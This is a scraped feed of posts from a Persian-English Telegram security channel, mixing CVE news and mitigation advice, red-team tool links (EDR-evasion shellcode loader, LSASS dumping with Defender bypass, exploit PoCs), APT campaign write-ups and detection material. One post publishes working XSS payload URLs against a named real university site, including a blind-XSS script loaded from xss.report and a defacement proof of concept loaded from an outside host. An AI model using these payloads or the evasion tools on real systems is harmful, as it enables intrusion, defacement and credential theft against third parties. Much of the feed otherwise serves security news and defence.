iDeFense
👁🗨UPDATED 💢 CVE-2024-49112 : Windows Lightweight Directory Access Protocol - Remote Code Execution (AKA : LDAP Nightmare) ( The RCE vulnerability was assigned as CVE-2024-49112 and was given the CVSS severity score of 9.8 out of 10 ) ♨️ cve-2024-49113…
🛟 To mitigate the risks associated with CVE-2024-49112, organizations should implement several strategies.
🔰 First, deploy the Microsoft patch for CVE-2024-49112 as soon as possible.
🔰 Second, implement network monitoring to detect suspicious CLDAP referral responses, DsrGetDcNameEx2 calls, and DNS SRV queries.
🔰 Third, enforce access controls by restricting network access to LDAP services and ensuring only trusted devices can communicate with Domain Controllers.
@iDeFense
🔰 First, deploy the Microsoft patch for CVE-2024-49112 as soon as possible.
🔰 Second, implement network monitoring to detect suspicious CLDAP referral responses, DsrGetDcNameEx2 calls, and DNS SRV queries.
🔰 Third, enforce access controls by restricting network access to LDAP services and ensuring only trusted devices can communicate with Domain Controllers.
@iDeFense
🙏4
🌐 پروژه NjForward یک ابزار رایگان و متنباز برای پورت فورواردینگ و ایجاد VPN خصوصی در ویندوز، که امکان ایجاد تونلهای TCP را برای اهداف مختلف (شامل تستهای امنیتی و نیازهای تخصصی شبکه) فراهم میکند...
جایگزینی بهینه و قابلاعتمادتر نسبت به RDP
🕸 https://github.com/ac3ss0r/NjForward/
#PortForwarding
#RedTeam
#tools
#TCPtunneling
@iDeFense
جایگزینی بهینه و قابلاعتمادتر نسبت به RDP
🕸 https://github.com/ac3ss0r/NjForward/
#PortForwarding
#RedTeam
#tools
#TCPtunneling
@iDeFense
👍11
🚩 استفاده از Cloudflared برای ایجاد تونلهای امن و حفظ پایداری در RedTeaming
👁🗨 https://www.youtube.com/watch?v=JC1hIppKLhI
🚩 ابزار تخصصی NetExec (نام جدید پروژه اصلی CrackMapExec ) برای ارزیابی امنیت شبکه و خودکارسازی تستهای نفوذ
👁🗨 https://www.netexec.wiki/
📝 https://github.com/Pennyw0rth/NetExec
#PenetrationTesting
#RedTeam
#tools
#BypassDefense
@iDeFense
👁🗨 https://www.youtube.com/watch?v=JC1hIppKLhI
🚩 ابزار تخصصی NetExec (نام جدید پروژه اصلی CrackMapExec ) برای ارزیابی امنیت شبکه و خودکارسازی تستهای نفوذ
👁🗨 https://www.netexec.wiki/
📝 https://github.com/Pennyw0rth/NetExec
#PenetrationTesting
#RedTeam
#tools
#BypassDefense
@iDeFense
YouTube
Using Cloudflared for Tunneling and Persistence
Discover how to leverage Cloudflared for secure tunneling and persistence, tailored for red team operations. This video walks you through setting up Cloudflared to bypass traditional network defenses, maintain covert access, and streamline your testing. Perfect…
❤8👍1
🔬 Dumping LSASS.exe Process Memory (Windows Defender Bypass 2025)
👁🗨 Video : https://youtu.be/GoxR7W6vjns?si=D9b_rpN4tqRb_0rd
🛠 Tools ==> https://github.com/ricardojoserf/NativeDump
📚 https://ricardojoserf.github.io/nativedump/
🔗 related: https://t.iss.one/iDefense/616
🚩 https://attack.mitre.org/techniques/T1003/001/
#Dump_Lsass
#RedTeam
#NTAPI
#BypassDefense
#Bypass
#Credential_Access
@iDeFense
YouTube
Cyber Security - Dump Windows LSASS.exe Process Memory (Windows Defender Bypass)
Be better than yesterday -
This video demonstrates that it is possible to bypass the latest Windows Defender running on a fully updated Windows computer, successfully dumping the LSASS.exe process memory for credentials harvesting.
DISCLAIMER:
All content…
This video demonstrates that it is possible to bypass the latest Windows Defender running on a fully updated Windows computer, successfully dumping the LSASS.exe process memory for credentials harvesting.
DISCLAIMER:
All content…
❤6
🔻 Cambridge University 🎓
⭕️ Bug : XSS
👁🗨 alert Bug 🤷♀️
👁🗨 blind XSS 🤷♀️
👁🗨 deface POC :
#BUG
#XSS
#vulnerable
#WEB
@iDeFense
⭕️ Bug : XSS
👁🗨 alert Bug 🤷♀️
https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(9155)%3C/ScRiPt%3E
👁🗨 blind XSS 🤷♀️
https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://xss.report/c/{username}%3E%3C/script%3E
👁🗨 deface POC :
https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://jso-tools.z-x.my.id/raw/~/VYHMKG89QIWNM%3E%3C/script%3E
#BUG
#XSS
#vulnerable
#WEB
@iDeFense
👍7👏1
👨💻 OSCP (PWK) Cheat Sheet.
📚 Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP).
- Basics;
- Information Gathering;
- Vulnerability Analysis;
- Web Application Analysis;
- Database Assessment;
- Password Attacks;
- Exploitation Tools;
- Post Exploitation;
- Exploit Databases;
- CVEs;
- Payloads;
- Wordlists;
- Social Media Resources;
- Commands.
#OSCP
#PWK
#CheatSheet
@iDeFense
GitHub
GitHub - 0xsyr0/OSCP: OSCP Cheat Sheet
OSCP Cheat Sheet. Contribute to 0xsyr0/OSCP development by creating an account on GitHub.
🔥3
👻 Ghost: Shellcode Loader
💢 پروژه Ghost ابزاری برای دور زدن قابلیتهای تشخیصی که معمولاً توسط سیستمهای EDR پیادهسازی میشوند...
👁🗨 https://github.com/cpu0x00/Ghost
🔺 دور زدن kernel callbacks با استفاده از fiber threads
🔺 جعل (Return Address Spoofing) , (Stack Spoofing)
🔺 پنهانسازی شل کد در داخل مناطق حافظه بزرگ و تصادفی
🔺غیرفعال کردن ETW
🔺حذف توابع EDR از فرآیندهای معلق
🔺هشینگ سفارشی API برای حل توابع
#EDR
#Defense_Evasion
#tools
#Bypass
#BypassDefense
#Detection
@iDeFense
💢 پروژه Ghost ابزاری برای دور زدن قابلیتهای تشخیصی که معمولاً توسط سیستمهای EDR پیادهسازی میشوند...
👁🗨 https://github.com/cpu0x00/Ghost
🔺 دور زدن kernel callbacks با استفاده از fiber threads
⚙️ با استفاده از این fiber threads، میتوان عملیاتهای خطرناک را به نحوی انجام داد که ابزارهای امنیتی که در سطح هسته (kernel) کار میکنند، نتوانند آنها را شناسایی کنند
🔺 جعل (Return Address Spoofing) , (Stack Spoofing)
⚙️این تکنیک شامل تغییرات در پشته فراخوانی (Call Stack) است تا مسیر واقعی اجرای برنامه پنهان بماند. با این کار، میتوان عملکردهای مخرب را به نحوی فراخوانی کرد که ابزارهای امنیتی نتوانند آنها را شناسایی یا متوقف کنند
🔺 پنهانسازی شل کد در داخل مناطق حافظه بزرگ و تصادفی
⚙️ این تکنیک با پنهان کردن شل کد در بخشهایی از حافظه که اندازه بزرگ و تصادفی دارند، میتواند از شناسایی آن توسط ابزارهای امنیتی جلوگیری کند. این بخشهای حافظه ممکن است به طور تصادفی تخصیص داده شوند تا شل کد در نواحی غیرمنتظره قرار گیرد
🔺غیرفعال کردن ETW
🔺حذف توابع EDR از فرآیندهای معلق
⚙️ این ویژگی به نرمافزار اجازه میدهد تا توابعی که توسط ابزارهای EDR برای شناسایی تهدیدها به فرآیندهای سیستم افزوده شدهاند را حذف کند
🔺هشینگ سفارشی API برای حل توابع
⚙️ این تکنیک از هشهای سفارشی برای توابع API استفاده میکند تا از شناسایی و تجزیه و تحلیل آنها توسط ابزارهای امنیتی جلوگیری کند
#EDR
#Defense_Evasion
#tools
#Bypass
#BypassDefense
#Detection
@iDeFense
GitHub
GitHub - cpu0x00/Ghost: Evasive shellcode loader
Evasive shellcode loader. Contribute to cpu0x00/Ghost development by creating an account on GitHub.
🔥5❤1
⭕️ CVE-2024-49138 : Windows Common Log File System Driver Privilege Escalation
📝 به گزارش CrowdStrike آسیبپذیری شناسایی شده به طور فعال توسط عوامل تهدید مورد سوء استفاده قرار میگرفت
⚠️ Tested on Windows 11 23h2
♨️ POC : https://github.com/MrAle98/CVE-2024-49138-POC
🔰 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138
#CVE
#Privilege_escalation
@iDeFense
📝 به گزارش CrowdStrike آسیبپذیری شناسایی شده به طور فعال توسط عوامل تهدید مورد سوء استفاده قرار میگرفت
⚠️ Tested on Windows 11 23h2
♨️ POC : https://github.com/MrAle98/CVE-2024-49138-POC
🔰 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138
#CVE
#Privilege_escalation
@iDeFense
GitHub
GitHub - MrAle98/CVE-2024-49138-POC: POC exploit for CVE-2024-49138
POC exploit for CVE-2024-49138. Contribute to MrAle98/CVE-2024-49138-POC development by creating an account on GitHub.
👍5
🔬 Deep Dive Into a Linux Rootkit Malware
📝 تیم FortiGuard Incident Response (FGIR) در حین بررسی یک حادثه امنیتی متوجه شد که مهاجم از آسیبپذیری CVE-2024-8190 بر روی سرویسهای ابری Ivanti و دو آسیبپذیری دیگر (که یکی مربوط به (Path Traversal) در منبع /client/index.php که به مهاجم این امکان را میدهد که به منابع دیگری مانند users.php، reports.php و... دسترسی غیرمجاز پیدا کند ( CVE-2024-8963 ) و دیگری به تزریق دستور (Command Injection) در منبع reports.php مربوط میشود CVE-2024-9380 ) برای نفوذ به سیستمهای Ivanti و دسترسی غیرمجاز به منابع مختلف استفاده کرده است
🦠 پس از نفوذ به سیستم، مهاجمان یک rootkit (که در اینجا یک ماژول کرنل قابل بارگذاری به نام sysinitd.ko است) و یک فایل باینری در فضای کاربر به نام sysinitd را مستقر کردهاند
🕷 استفاده از اسکریپت برای نصب rootkit: مهاجمان از یک Shell script به نام Install[.]sh برای نصب و راهاندازی rootkit و باینریها استفاده کردهاند
🔍 پایداری rootkit : برای اطمینان از اینکه rootkit بهطور خودکار در هر بار راهاندازی سیستم اجرا شود، ورودیهایی برای این rootkit به فایلهای سیستم مانند
/etc/rc.local و /etc/rc.d/rc.local
اضافه شده است که این فایلها برای بارگذاری خودکار برنامهها هنگام شروع سیستم استفاده میشوند...
🔬 Deep Dive Into This Linux Rootkit
👁🗨 https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa (بررسی حمله)
|
∟📂 https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware (بررسی روت کیت)
#Linux
#Rootkit
#Malware
#Ivanti
#Cloud_Services
#analysis
@iDeFense
Fortinet Blog
Deep Dive Into a Linux Rootkit Malware
An in-depth analysis of how a remote attacker deployed a rootkit and a user-space binary file by executing a shell script.…
❤🔥5👍1
🔻 CVE-2024-43468 Microsoft Configuration Manager (ConfigMgr / SCCM) 2403
🦠 Unauthenticated SQL injections (CVE-2024-43468) exploit
🔻 نسخههای آسیبپذیر
⚠️ تمام نسخههای Microsoft Configuration Manager که یکی از بهروزرسانیهای زیر را ندارند، آسیبپذیر هستند:
🔬 https://telegra.ph/آسیبپذیری-CVE-2024-43468-SQL-Injection-بر-روی-Microsoft-Configuration-Manager-بدون-نیاز-به-احراز-هویت-01-17
📚https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections
(16/01/2025)
♨️ POC: https://github.com/synacktiv/CVE-2024-43468
🔰 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468
#SQL_injections
#SQLInjection
#ConfigMgr
#SCCM
#RCE
#CVE
@iDeFense
🦠 Unauthenticated SQL injections (CVE-2024-43468) exploit
🔻 نسخههای آسیبپذیر
⚠️ تمام نسخههای Microsoft Configuration Manager که یکی از بهروزرسانیهای زیر را ندارند، آسیبپذیر هستند:
نسخههای پایینتر از 2403 (شماره نسخه: 5.00.9128.1024)
نسخههای پایینتر از 2309 (شماره نسخه: 5.00.9122.1033)
نسخههای پایینتر از 2303 (شماره نسخه: 5.00.9106.1037)
نسخههای 2211 و قدیمیتر
🔬 https://telegra.ph/آسیبپذیری-CVE-2024-43468-SQL-Injection-بر-روی-Microsoft-Configuration-Manager-بدون-نیاز-به-احراز-هویت-01-17
📚https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections
(16/01/2025)
♨️ POC: https://github.com/synacktiv/CVE-2024-43468
🔰 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468
#SQL_injections
#SQLInjection
#ConfigMgr
#SCCM
#RCE
#CVE
@iDeFense
Telegraph
آسیبپذیری CVE-2024-43468 (SQL Injection) بر روی Microsoft Configuration Manager بدون نیاز به احراز هویت
آسیبپذیری CVE-2024-43468 در Microsoft Configuration Manager (ConfigMgr یا SCCM) به مهاجمان اجازه میدهد تا بدون نیاز به احراز هویت، دستورات SQL دلخواه خود را بر روی پایگاه داده سایت اجرا کنند. این حمله از طریق ارسال درخواستهای HTTP/HTTPS به سرویس Management…
❤🔥4👍3⚡1
👽 Hunting for Persistence in Linux:
🔘 (Part 1): Auditd, Sysmon, Osquery (and Webshells);
🔘 (Part 2): Account Creation and Manipulation;
🔘 (Part 3): Systemd, Timers, and Cron;
🔘 (Part 4): Initialization Scripts and Shell Configuration;
🔘 (Part 5): Systemd Generators.
#Linux
#RedTeam
#BlueTeam
#persistence
#auditd
@iDeFense
🔘 (Part 1): Auditd, Sysmon, Osquery (and Webshells);
🔘 (Part 2): Account Creation and Manipulation;
🔘 (Part 3): Systemd, Timers, and Cron;
🔘 (Part 4): Initialization Scripts and Shell Configuration;
🔘 (Part 5): Systemd Generators.
#Linux
#RedTeam
#BlueTeam
#persistence
#auditd
@iDeFense
👏4👍1
This media is not supported in your browser
VIEW IN TELEGRAM
‼️ Chief information security officer (CISO) VS Hacker 🤪
#fun
#CISO
#phishing
#sim_Jacking
#Credential_stuffing
#Social_engineering
#MFA_Bypass_Proxy
#AI_Powered_Phishing
@iDeFense
#fun
#CISO
#phishing
#sim_Jacking
#Credential_stuffing
#Social_engineering
#MFA_Bypass_Proxy
#AI_Powered_Phishing
@iDeFense
😁14👍1👌1
🚧 مجموعه LOLC2 معرفی فریمورکهای C2 است که از سرویسهای قانونی و معتبر برای پنهان شدن از سیستمهای تشخیص استفاده میکند
♦️ در میان این فریمورکها، برخی از C2ها عبارتند از:
Telegram, Asana, OneDrive, Microsoft Tasks, Jira, Notion👀,splunk🪱 و دیگر سرویسهای مشابه
🔗 https://lolc2.github.io/
#C2Frameworks
#MalwareDetection
#LOLC2
#BehavioralAnalysis
#APIMonitoring
#YaraRules
#ThreatDetection
#NetworkSecurity
#RedTeam
#SOC
@iDeFense
♦️ در میان این فریمورکها، برخی از C2ها عبارتند از:
Telegram, Asana, OneDrive, Microsoft Tasks, Jira, Notion👀,splunk🪱 و دیگر سرویسهای مشابه
🔰 روشهای تشخیص:
🔍 تدوین قوانین و فیلتر کردن اتصالات
🔍 تحلیل رفتار (Behavioral Analysis) برای شناسایی فعالیتها
🔍 استفاده از ابزار یارا (Yara)
🔍 نظارت بر فرآیندها و درخواستهای API
🔗 https://lolc2.github.io/
#C2Frameworks
#MalwareDetection
#LOLC2
#BehavioralAnalysis
#APIMonitoring
#YaraRules
#ThreatDetection
#NetworkSecurity
#RedTeam
#SOC
@iDeFense
👍3
🔖 در ژانویهٔ ۲۰۲۵، گروه #VelvetChollima حملات پیچیدهای را علیه مقامات دولتی کره جنوبی و شرکتهای رسانهای در آمریکای شمالی و ... آغاز کرد
🔻 مهاجمان یک فایل PDF حاوی یک لینک پنهان ایجاد میکردند که این لینک بهگونهای طراحی شده بود که در متن سند قابل مشاهده نباشد، تا گیرنده بدون آگاهی از وجود آن، روی آن کلیک کند
🔺 پس از کلیک روی لینک، قربانی به صفحهای جعلی هدایت میشد که شبیه به یک صفحه تأیید هویت کپچا طراحی شده بود. این صفحه با نمایش پیامی از کاربر میخواست تا برای تأیید اینکه ربات نیست، دستورات خاصی را در PowerShell با دسترسی مدیر سیستم اجرا کند. این تکنیک مهندسی اجتماعی، معروف به «ClickFix»، کاربران را فریب میدهد تا خودشان کدهای مخرب را اجرا کنند
🔻 در این مرحله دستورات PowerShell ارائهشده توسط مهاجمان، یک (Reverse Shell) به سرور (C2) مهاجمان برقرار میکرد که امکان اجرای دستورات از راه دور را روی سیستم قربانی فراهم میکرده است
🔗 https://github.com/S3N4T0R-0X0/APT-Attack-Simulation/tree/main/North%20Koreans%20APT/Velvet%20Chollima
#RedTeam
#C2
#Kimsuky
#ClickFix
#APT_Adversary_Simulation
@iDeFense
🔻 مهاجمان یک فایل PDF حاوی یک لینک پنهان ایجاد میکردند که این لینک بهگونهای طراحی شده بود که در متن سند قابل مشاهده نباشد، تا گیرنده بدون آگاهی از وجود آن، روی آن کلیک کند
🔺 پس از کلیک روی لینک، قربانی به صفحهای جعلی هدایت میشد که شبیه به یک صفحه تأیید هویت کپچا طراحی شده بود. این صفحه با نمایش پیامی از کاربر میخواست تا برای تأیید اینکه ربات نیست، دستورات خاصی را در PowerShell با دسترسی مدیر سیستم اجرا کند. این تکنیک مهندسی اجتماعی، معروف به «ClickFix»، کاربران را فریب میدهد تا خودشان کدهای مخرب را اجرا کنند
🔻 در این مرحله دستورات PowerShell ارائهشده توسط مهاجمان، یک (Reverse Shell) به سرور (C2) مهاجمان برقرار میکرد که امکان اجرای دستورات از راه دور را روی سیستم قربانی فراهم میکرده است
🔗 https://github.com/S3N4T0R-0X0/APT-Attack-Simulation/tree/main/North%20Koreans%20APT/Velvet%20Chollima
#RedTeam
#C2
#Kimsuky
#ClickFix
#APT_Adversary_Simulation
@iDeFense
❤🔥7🤷♂3👀1
😈 Pwning the Domain: With Credentials.
• Domain Account;
• Enumeration;
• BloodHound;
• PowerView;
• Kerberoasting;
• PrinterBug(MS-PRPN);
• ShadowCoerce(MS-FSRVP);
• DFSCoerce(MS-DFSNM);
• SMB share;
• Vulnerabilities;
• PrivExchange Vulnerability;
• SamAccountName/NoPac;
- SamAccountName/NoPac Attack;
• PrintNightmare;
• Certifried;
- Certifried Exploitation;
• Domain Admin;
• Dump NTDS;
• DCSync;
• Extract Credentials;
• LSASS DUMP;
• SAM/LSA DUMP;
• DPAPI Dump/Decryption;
• Token Manipulation;
• Adjust token privileges;
• Token Impersonation;
• Security Researchers.
#AD
#Domain
#Credentials
#RedTeam
@iDeFense
• Domain Account;
• Enumeration;
• BloodHound;
• PowerView;
• Kerberoasting;
• PrinterBug(MS-PRPN);
• ShadowCoerce(MS-FSRVP);
• DFSCoerce(MS-DFSNM);
• SMB share;
• Vulnerabilities;
• PrivExchange Vulnerability;
• SamAccountName/NoPac;
- SamAccountName/NoPac Attack;
• PrintNightmare;
• Certifried;
- Certifried Exploitation;
• Domain Admin;
• Dump NTDS;
• DCSync;
• Extract Credentials;
• LSASS DUMP;
• SAM/LSA DUMP;
• DPAPI Dump/Decryption;
• Token Manipulation;
• Adjust token privileges;
• Token Impersonation;
• Security Researchers.
#AD
#Domain
#Credentials
#RedTeam
@iDeFense
👍4🤝3❤2🤔2
💢 گروه Sandworm (معروف به APT44)، در حال اجرای یک کمپین سایبری علیه کاربران ویندوز در اوکراین است. این گروه با استفاده از ابزارهای فعالسازی KMS مایکروسافت دستکاریشده و بهروزرسانیهای جعلی ویندوز، نسخهای جدید از بارگذار BACKORDER را توزیع میکند که در نهایت به استقرار تروجان دسترسی از راه دور Dark Crystal RAT (DcRAT) منجر میشود (این بدافزار به مهاجمان امکان سرقت دادههای حساس و جاسوسی سایبری را میدهد)
🔬 شواهد متعددی این کمپین را به Sandworm مرتبط میکند، از جمله استفاده مکرر از حسابهای ProtonMail در سوابق WHOIS، زیرساختهای یکسان، و تکنیکها و روشهای تاکتیکی (TTPs) مشابه. علاوه بر این، استفاده مجدد از BACKORDER، DcRAT، و مکانیزمهای شبکه TOR، همراه با نشانههایی که به محیط ساخت ابزار به زبان روسی اشاره دارند، این ارتباط را تقویت میکنند.
🦠 استفاده گسترده از نرمافزارهای کرکشده در اوکراین، حتی در نهادهای دولتی، سطح حمله بزرگی را ایجاد کرده است. بر اساس گزارشها، مایکروسافت تخمین زده است که 70٪ از نرمافزارهای بخش دولتی اوکراین بدون مجوز هستند، که این روند احتمالاً به دلیل مشکلات اقتصادی ناشی از جنگ تشدید شده است. بسیاری از کاربران، از جمله کسبوکارها و نهادهای حیاتی، به نرمافزارهای کرک شده از منابع نامعتبر روی آوردهاند، که به مهاجمانی مانند Sandworm فرصت میدهد بدافزار را در برنامههای پرکاربرد جاسازی کنند. این تاکتیک امکان جاسوسی گسترده، سرقت دادهها، و نفوذ به شبکهها را فراهم میکند، که مستقیماً امنیت ملی، زیرساختهای حیاتی، و مقاومت بخش خصوصی اوکراین را تهدید میکند.
🌐 https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns
🔗 https://nsarchive.gwu.edu/sites/default/files/documents/semon9-ryglx/2024-04-17-Mandiant-APT44-Unearthing-Sandworm.pdf
🔰Detection #SIGMA_Rules #YARA_Rule #IOCs #C2_Domains #MITRE_TTPs
#RedTeam #DcRAT #SIGMA_Rules
#Sandworm #C2
#APT44
#BACKORDER
@iDeFense
🔬 شواهد متعددی این کمپین را به Sandworm مرتبط میکند، از جمله استفاده مکرر از حسابهای ProtonMail در سوابق WHOIS، زیرساختهای یکسان، و تکنیکها و روشهای تاکتیکی (TTPs) مشابه. علاوه بر این، استفاده مجدد از BACKORDER، DcRAT، و مکانیزمهای شبکه TOR، همراه با نشانههایی که به محیط ساخت ابزار به زبان روسی اشاره دارند، این ارتباط را تقویت میکنند.
🦠 استفاده گسترده از نرمافزارهای کرکشده در اوکراین، حتی در نهادهای دولتی، سطح حمله بزرگی را ایجاد کرده است. بر اساس گزارشها، مایکروسافت تخمین زده است که 70٪ از نرمافزارهای بخش دولتی اوکراین بدون مجوز هستند، که این روند احتمالاً به دلیل مشکلات اقتصادی ناشی از جنگ تشدید شده است. بسیاری از کاربران، از جمله کسبوکارها و نهادهای حیاتی، به نرمافزارهای کرک شده از منابع نامعتبر روی آوردهاند، که به مهاجمانی مانند Sandworm فرصت میدهد بدافزار را در برنامههای پرکاربرد جاسازی کنند. این تاکتیک امکان جاسوسی گسترده، سرقت دادهها، و نفوذ به شبکهها را فراهم میکند، که مستقیماً امنیت ملی، زیرساختهای حیاتی، و مقاومت بخش خصوصی اوکراین را تهدید میکند.
⚠️ در یکی از این حملات، فایل فشردهای با عنوان "KMSAuto++x64_v1.8.4.zip" در تورنت منتشر شد که حاوی BACKORDER بود. مهاجمان این فایل را بهعنوان ابزاری برای فعالسازی KMS معرفی کردند تا کاربرانی را که قصد دور زدن نیازهای مجوز ویندوز را دارند، هدف قرار دهند. این ابزار پس از اجرا، یک رابط جعلی فعالسازی ویندوز را نمایش میدهد، در حالی که در پسزمینه، بارگذار BACKORDER را اجرا میکند که در نهایت به استقرار DcRAT منجر میشود.
🌐 https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns
🔗 https://nsarchive.gwu.edu/sites/default/files/documents/semon9-ryglx/2024-04-17-Mandiant-APT44-Unearthing-Sandworm.pdf
🔰Detection #SIGMA_Rules #YARA_Rule #IOCs #C2_Domains #MITRE_TTPs
#RedTeam #DcRAT #SIGMA_Rules
#Sandworm #C2
#APT44
#BACKORDER
@iDeFense
😨5👍3❤1🫡1
🔬 رویداد
🛠 مبدل Granted Access یک ابزار که برای کمک به کاربران در درک و تفسیر مقادیر فیلد
که این امکان را به کاربران می دهد تا مقادیر دسترسی hexadecimal مشخص شده جهت دسترسی را به مقادیر قابل خواندن انسانی تبدیل کنند و برعکس
🌐 https://yukh1402.github.io/granted-access-converter/
✅ همچنین میتوانید خودتان نیز این مقادیر را توسط اسکریپت زیر تبدیل کنید
🛠 https://www.powershellgallery.com/packages/PSGumshoe/1.5/Content/EventLog%5CGet-SysmonAccessMask.ps1
#SOC
#tools
#BlueTeam
#Process_Injection
#Detection
@iDeFense
EventID 10 در Sysmon، که بهعنوان Process Access شناخته میشود، زمانی ثبت میشود که یک فرآیند سعی میکند به فرآیند دیگری دسترسی پیدا کند. این رویداد اطلاعاتی درباره تعاملات بین فرآیندها ارائه میدهد و میتواند در شناسایی و نظارت بر تعاملات فرآیندها و بررسی فعالیتهای مخرب مفید باشد⚒️ ویژگی ها:
✅ شناسایی دسترسیهای غیرمجاز
✅ شناسایی تلاشهای Privilege Escalation
✅ شناسایی تکنیکهای Process Injection
🛠 مبدل Granted Access یک ابزار که برای کمک به کاربران در درک و تفسیر مقادیر فیلد
GrantedAccess موجود در SYSMON EventID 10 نوشته شده استکه این امکان را به کاربران می دهد تا مقادیر دسترسی hexadecimal مشخص شده جهت دسترسی را به مقادیر قابل خواندن انسانی تبدیل کنند و برعکس
🌐 https://yukh1402.github.io/granted-access-converter/
✅ همچنین میتوانید خودتان نیز این مقادیر را توسط اسکریپت زیر تبدیل کنید
Get-SysmonAccessMask -AccessMask 0x418
🛠 https://www.powershellgallery.com/packages/PSGumshoe/1.5/Content/EventLog%5CGet-SysmonAccessMask.ps1
#SOC
#tools
#BlueTeam
#Process_Injection
#Detection
@iDeFense
👍5❤🔥2